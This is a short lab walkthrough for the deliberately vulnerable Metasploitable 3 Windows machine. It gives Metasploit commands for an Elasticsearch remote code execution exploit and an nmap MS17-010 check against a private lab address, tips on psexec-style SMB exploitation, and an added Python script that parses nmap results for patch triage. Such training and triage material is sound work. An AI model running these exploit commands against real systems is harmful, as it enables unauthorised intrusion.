Metasploitable 3 Windows Walkthrough

Metasploitable 3 is a deliberately vulnerable virtual machine designed by Rapid7 for practicing penetration testing. Unlike its Linux-based predecessor, the Windows version presents a target rich with common Windows misconfigurations, outdated services, and unpatched vulnerabilities typical of legacy enterprise environments.

Disclaimer: This guide is for educational purposes only. Only perform these techniques on systems you own or have explicit permission to test.

msfconsole
msf6 > use exploit/multi/elasticsearch/script_mvel_rce
msf6 > set RHOSTS 192.168.56.102
msf6 > set HTTP_PORT 9200
msf6 > set TARGET Windows
msf6 > exploit

If successful, you get a Java shell, but we still need to escalate to Windows cmd.exe.


nmap --script smb-vuln-ms17-010 -p 445 192.168.56.102

If it says VULNERABLE, proceed. If not, move to the next part (no worries, there are 20 other ways in).
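
For patch triage across several hosts, the same check can be read by a script instead of by eye. The following is an added example, not part of the original walkthrough: it parses saved nmap output and reports each host's smb-vuln-ms17-010 state. The sample output, the hosts 192.168.56.103 and .104, and the function names are constructed for illustration.

```python
import re

# Constructed nmap output; host .104 mimics a run with --script-args vulns.showall.
SAMPLE = """\
Nmap scan report for 192.168.56.102
Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for 192.168.56.103
PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 192.168.56.104
Host script results:
| smb-vuln-ms17-010: 
|   NOT VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|_    State: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:.*\()?([^\s()]+)\)?$")
SCRIPT_RE = re.compile(r"^\|[_ ] ?([\w-]+):")           # first line of a script's output
STATE_RE = re.compile(r"^\|[_ ]\s*State:\s*(.+?)\s*$")  # state line inside that output


def ms17_010_status(nmap_text):
    """Return {host: state}; 'NOT REPORTED' means the script printed nothing."""
    results, host, script = {}, None, None
    for line in nmap_text.splitlines():
        if (m := HOST_RE.match(line)):
            host, script = m.group(1), None
            results[host] = "NOT REPORTED"
        elif host and (m := SCRIPT_RE.match(line)):
            script = m.group(1)
        elif script == "smb-vuln-ms17-010" and (m := STATE_RE.match(line)):
            results[host] = m.group(1)
    return results


def hosts_to_patch(nmap_text):
    """Hosts whose state begins with VULNERABLE or LIKELY VULNERABLE.
    A plain substring search would wrongly include 'NOT VULNERABLE'."""
    flagged = ("VULNERABLE", "LIKELY VULNERABLE")
    return sorted(h for h, s in ms17_010_status(nmap_text).items()
                  if s.startswith(flagged))
```

A host marked NOT REPORTED was not confirmed safe; the script simply produced no output for it, for example because port 445 was closed or filtered.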

Metasploitable 3 is notoriously unstable under heavy SMB exploits. Solution: Don't use EternalBlue. Use exploit/windows/smb/ms17_010_psexec instead, which is less aggressive, or stick to WinRM.
